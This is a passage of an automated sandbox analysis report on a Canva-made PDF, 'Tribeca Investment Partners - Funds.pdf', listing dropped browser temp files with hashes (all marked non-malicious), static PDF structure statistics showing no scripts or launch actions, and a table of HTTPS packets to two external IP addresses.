                                                                                                                                                                                                                                                        Preview: .<!DOCTYPE HTML>.<html class="spectrum--medium" lang="en">. <head>. <title>Legal</title>. <link rel="canonical" href="https://www.adobe.com/legal/terms.html"/>. .. . . . <link rel="alternate" hreflang="en-IE" href="https://www.adobe.com/ie/legal/terms.html"/>. . <link rel="alternate" hreflang="de" href="https://www.adobe.com/de/legal/terms.html"/>. . <link rel="alternate" hreflang="uk-UA" href="https://www.adobe.com/ua/legal/terms.html"/>. . <link rel="alternate" hreflang="ar-kw" href="https://www.adobe.com/mena_ar/legal/terms.html"/>. . <link rel="alternate" hreflang="en-us" href="https://www.adobe.com/legal/terms.html"/>. . <link rel="alternate" hreflang="lv-LV" href="https://www.adobe.com/lv/legal/terms.html"/>. . <link rel="alternate" hreflang="en-IL" href="https://www.adobe.com/il_en/legal/terms.html"/>. . <link rel="
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF8227BB7BB94304CB.TMP
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):154815
                                                                                                                                                                                                                                                        Entropy (8bit):1.3704907447834318
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:kBqoxKA84bcvRT6hUR9L92alWhpV8c+Mc+1ghNjLO19gNTTiMt/NUPa5m1CdiGM0:xKM1NUt9GX9+FOGCHLO++t5qq/Ri
                                                                                                                                                                                                                                                        MD5:A6B971C1C0F313F30D2080609D754D8D
                                                                                                                                                                                                                                                        SHA1:9171E9BDB9B9EC895EACC6AD6997EB04950827FA
                                                                                                                                                                                                                                                        SHA-256:BEEB9CF8F51B652F6BC64A4C380B9C2046A6357DD9EB68054B5EF66FDB3E4569
                                                                                                                                                                                                                                                        SHA-512:8FBCF97B9F82E949D58D5C9081B0473BF4339827B1D9125683397CB16BB821E17A015E0EB237AEF9AB2D8B9642E01F6B440406E878BEA1E3D2D312AF19D886E9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DFC0840655B7581AA6.TMP
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):13077
                                                                                                                                                                                                                                                        Entropy (8bit):0.5007378164149091
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lovF9lot9lWpWIUWI0W5WwNs:kBqoIWoJqS
                                                                                                                                                                                                                                                        MD5:3E9E8BED755710BEE96D936B83B16E58
                                                                                                                                                                                                                                                        SHA1:6FEF4ECD397CA44D608FAB6ED1F8DED52E233233
                                                                                                                                                                                                                                                        SHA-256:DE46AA0FE819B631DAEEFCF5706D84932B602CE4526CCACBFFA778E2D73E2B2C
                                                                                                                                                                                                                                                        SHA-512:B2C5B3E94BC925E8D94AFEB18EE0AE098B7799EFE8C4DA438A8B42C6D68D4491A91276BA9356B7F44FD414C77753E1F706E76338654D330D6037D2FE545C5E71
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DFF706A052856AEE8E.TMP
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):25441
                                                                                                                                                                                                                                                        Entropy (8bit):0.34705457722473776
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAggh1:kBqoxxJhHWSVSEab
                                                                                                                                                                                                                                                        MD5:8C8E6E9A664D952C86ADEED5C68A6E6E
                                                                                                                                                                                                                                                        SHA1:1DFFA64D67DB4A4D20489D4116D68CB508E87C4D
                                                                                                                                                                                                                                                        SHA-256:BA8DCC6350D1EE0D258F30F29602127B53B588CD6FFF7FCEA0E84BDEB873E89E
                                                                                                                                                                                                                                                        SHA-512:337E417EE910AE766852CCAAB8423569600FADC44B8BCD02DF603FD4A03EA2383224AA23A3325A2C9661B111F2B68DF1D75F1C48CF30E4EE6C8256DF264E8C2B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WVUC0OGWOR2XHS4OYII5.temp
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3440
                                                                                                                                                                                                                                                        Entropy (8bit):3.1909217966246497
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:9dikP1IWC9GrIoPAsASF0dikP1IWh683GrIoPAczH:7P1g9SvAJHP1p3SvAG
                                                                                                                                                                                                                                                        MD5:2EE6B4526D74551328B19299ADEF53D9
                                                                                                                                                                                                                                                        SHA1:70908D6B25CFB6FF9992EF46031E66CC0D9245E8
                                                                                                                                                                                                                                                        SHA-256:2B135F078AF7466E135006413A1E529BEAEC4EF27B203B9AF94625227F1347AA
                                                                                                                                                                                                                                                        SHA-512:D2ADAF9CFF7F1D4B005B6AC961F30766B47D0ED9EED6A1320760AAE84400E17373FE3D5AC8F89350B5BDD7E4FA5FF28EB1016E7B7EA212B91455F01272FF2D4D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: ...................................FL..................F.@.. .....@.>...7....^....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L.>Qnx....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........\.U.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        File type:PDF document, version 1.4
                                                                                                                                                                                                                                                        Entropy (8bit):7.923657090473706
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Adobe Portable Document Format (5005/1) 100.00%
                                                                                                                                                                                                                                                        File name:Tribeca Investment Partners - Funds.pdf
                                                                                                                                                                                                                                                        File size:200272
                                                                                                                                                                                                                                                        MD5:1f514a862d7eb6e2c4952b67a97a4e56
                                                                                                                                                                                                                                                        SHA1:4a4d5f759793397ebdc72679895ef62f6a74fed3
                                                                                                                                                                                                                                                        SHA256:6c796e1a57333bc61e0a45a6398da2393ce0529304b57abc8d22125862a02211
                                                                                                                                                                                                                                                        SHA512:0911f3f36a44bd0ded6b5b21d422478e3000eda11b8e1aaf8183fcbdb469f50ff9c66a84d6bd140114c7a434d2059ef22d8de57f942bcbfb1b662892fafa9df7
                                                                                                                                                                                                                                                        SSDEEP:3072:/09brBZCFS4SyYp1XNvubBFrrsVntyaNEwg5SN6mRsY/NNQbcuvfiwXx+HxM8nbV:/012FS1vGFrrSyaNd6bufQXlhSqb4t2i
                                                                                                                                                                                                                                                        File Content Preview:%PDF-1.4.%.....1 0 obj.<<./Type /Catalog./Pages 2 0 R./MarkInfo <<./Type /MarkInfo./Marked true.>>./StructTreeRoot 3 0 R.>>.endobj.4 0 obj.<<./Creator (Canva)./Producer (Canva)./CreationDate (D:20210610134729+00'00')./ModDate (D:20210610134729+00'00')./Ke

                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                        Icon Hash:74ecccdcd4ccccf0

                                                                                                                                                                                                                                                        Static PDF Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Header:%PDF-1.4
                                                                                                                                                                                                                                                        Total Entropy:7.923657
                                                                                                                                                                                                                                                        Total Bytes:200272
                                                                                                                                                                                                                                                        Stream Entropy:7.979116
                                                                                                                                                                                                                                                        Stream Bytes:182979
                                                                                                                                                                                                                                                        Entropy outside Streams:0.000000
                                                                                                                                                                                                                                                        Bytes outside Streams:17293
                                                                                                                                                                                                                                                        Number of EOF found:2
                                                                                                                                                                                                                                                        Bytes after EOF:

                                                                                                                                                                                                                                                        Keywords Statistics

                                                                                                                                                                                                                                                        NameCount
                                                                                                                                                                                                                                                        obj124
                                                                                                                                                                                                                                                        endobj124
                                                                                                                                                                                                                                                        stream9
                                                                                                                                                                                                                                                        endstream9
                                                                                                                                                                                                                                                        xref2
                                                                                                                                                                                                                                                        trailer2
                                                                                                                                                                                                                                                        startxref2
                                                                                                                                                                                                                                                        /Page2
                                                                                                                                                                                                                                                        /Encrypt0
                                                                                                                                                                                                                                                        /ObjStm0
                                                                                                                                                                                                                                                        /URI2
                                                                                                                                                                                                                                                        /JS0
                                                                                                                                                                                                                                                        /JavaScript0
                                                                                                                                                                                                                                                        /AA0
                                                                                                                                                                                                                                                        /OpenAction0
                                                                                                                                                                                                                                                        /AcroForm0
                                                                                                                                                                                                                                                        /JBIG2Decode0
                                                                                                                                                                                                                                                        /RichMedia0
                                                                                                                                                                                                                                                        /Launch0
                                                                                                                                                                                                                                                        /EmbeddedFile0

                                                                                                                                                                                                                                                        Image Streams

                                                                                                                                                                                                                                                        IDDHASHMD5Preview
                                                                                                                                                                                                                                                        1250a49a92a2b2ac4011d882a5533667ff70efe6570562d5e6

                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.073354006 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.073970079 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.116117954 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.116213083 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.116724968 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.116906881 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.132297993 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.132345915 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.174973965 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.175002098 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.175241947 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.175266027 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.175307035 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.175335884 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.177321911 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.177422047 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.179094076 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.179125071 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.179205894 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.184060097 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.184130907 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.208595991 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.208655119 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.214098930 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.214235067 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.214456081 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.251410961 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.251468897 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.251790047 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.251822948 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.251854897 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.251885891 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.252536058 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.252648115 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.252666950 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.252726078 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.253379107 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.253664017 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.256846905 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.256879091 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.256966114 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.256993055 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.257025957 CEST49735443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.259983063 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.260124922 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.296186924 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.296241999 CEST4434973513.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429012060 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429088116 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429141998 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429166079 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429199934 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429203987 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429208994 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429260015 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.429966927 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.430030107 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.430038929 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.430088997 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.431143999 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.431221008 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.622049093 CEST49737443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.622080088 CEST49738443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.622184038 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.622193098 CEST49739443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.622402906 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.664978981 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665024042 CEST4434973713.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665051937 CEST4434973813.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665080070 CEST4434973913.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665106058 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665132046 CEST49737443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665174961 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665201902 CEST49739443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665208101 CEST49738443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.665219069 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.666585922 CEST49737443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.666795015 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.666816950 CEST49739443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.666842937 CEST49738443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.666856050 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.709295034 CEST4434973713.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.709337950 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.709366083 CEST4434973913.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.709388971 CEST4434973813.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.709415913 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.710932970 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.710993052 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.711080074 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.711132050 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.712482929 CEST4434973813.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.712538958 CEST4434973813.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.712644100 CEST49738443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.712693930 CEST49738443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.713138103 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.713191986 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.713227987 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.713257074 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.714442968 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.714519024 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.715064049 CEST4434973913.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.715106010 CEST4434973913.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.715188026 CEST49739443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.715212107 CEST49739443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.717192888 CEST4434973713.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.717236996 CEST4434973713.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.717274904 CEST49737443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.717304945 CEST49737443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.718077898 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.718247890 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.718364000 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.718660116 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.718863964 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.718983889 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719085932 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719193935 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719309092 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719372034 CEST4434973913.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719419956 CEST4434973813.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719481945 CEST49739443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719497919 CEST49738443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.721126080 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.721640110 CEST4434973713.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.721738100 CEST49737443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.724185944 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.724735975 CEST49739443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.725065947 CEST49738443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.725281000 CEST49739443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.725532055 CEST49738443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.726017952 CEST49737443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.726402044 CEST49737443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.760868073 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.761221886 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.761323929 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.761445999 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.761605978 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.761765003 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.761842012 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.762005091 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.762094975 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.762270927 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.762346029 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.763022900 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.763546944 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.763886929 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.763926983 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.764043093 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.764592886 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.764616966 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.764687061 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.764734983 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.764765024 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.764830112 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.765022993 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.765052080 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.765104055 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.765125990 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.766007900 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.766036987 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.766081095 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.766133070 CEST49741443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.766659021 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.766890049 CEST4434974013.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.766957045 CEST49740443192.168.2.313.224.195.109
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.767188072 CEST4434974113.224.195.109192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.767225027 CEST4434974113.224.195.109192.168.2.3
